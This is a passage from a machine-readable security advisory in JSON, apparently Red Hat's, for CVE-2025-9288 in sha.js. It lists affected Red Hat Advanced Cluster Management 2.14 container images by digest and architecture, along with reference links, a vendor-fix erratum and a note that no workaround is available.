"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9288"
},
{
"category": "external",
"summary": "RHBZ#2389980",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389980"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
},
{
"category": "external",
"summary": "https://github.com/browserify/sha.js/pull/78",
"url": "https://github.com/browserify/sha.js/pull/78"
},
{
"category": "external",
"summary": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5",
"url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
}
],
"release_date": "2025-08-20T21:59:44.728000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-30T12:58:23+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:19335"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
